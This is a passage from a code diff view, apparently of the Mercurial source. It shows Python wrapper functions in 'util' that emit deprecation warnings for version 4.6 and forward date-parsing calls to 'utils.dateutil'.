4044 nouideprecwarn(msg, "4.6")
4036 nouideprecwarn(msg, "4.6")
4045 return dateutil.parsetimezone(*args, **kwargs)
4037 return dateutil.parsetimezone(*args, **kwargs)
4046
4038
4047 def strdate(*args, **kwargs):
4039 def strdate(*args, **kwargs):
4048 msg = ("'util.strdate' is deprecated, "
4040 msg = ("'util.strdate' is deprecated, "
4049 "use 'utils.dateutil.strdate'")
4041 "use 'utils.dateutil.strdate'")
4050 nouideprecwarn(msg, "4.6")
4042 nouideprecwarn(msg, "4.6")
4051 return dateutil.strdate(*args, **kwargs)
4043 return dateutil.strdate(*args, **kwargs)
4052
4044
4053 def parsedate(*args, **kwargs):
4045 def parsedate(*args, **kwargs):
4054 msg = ("'util.parsedate' is deprecated, "
4046 msg = ("'util.parsedate' is deprecated, "
4055 "use 'utils.dateutil.parsedate'")
4047 "use 'utils.dateutil.parsedate'")
4056 nouideprecwarn(msg, "4.6")
4048 nouideprecwarn(msg, "4.6")
4057 return dateutil.parsedate(*args, **kwargs)
4049 return dateutil.parsedate(*args, **kwargs)
4058
4050
4059 def matchdate(*args, **kwargs):
4051 def matchdate(*args, **kwargs):
4060 msg = ("'util.matchdate' is deprecated, "
4052 msg = ("'util.matchdate' is deprecated, "
4061 "use 'utils.dateutil.matchdate'")
4053 "use 'utils.dateutil.matchdate'")
4062 nouideprecwarn(msg, "4.6")
4054 nouideprecwarn(msg, "4.6")
4063 return dateutil.matchdate(*args, **kwargs)
4055 return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now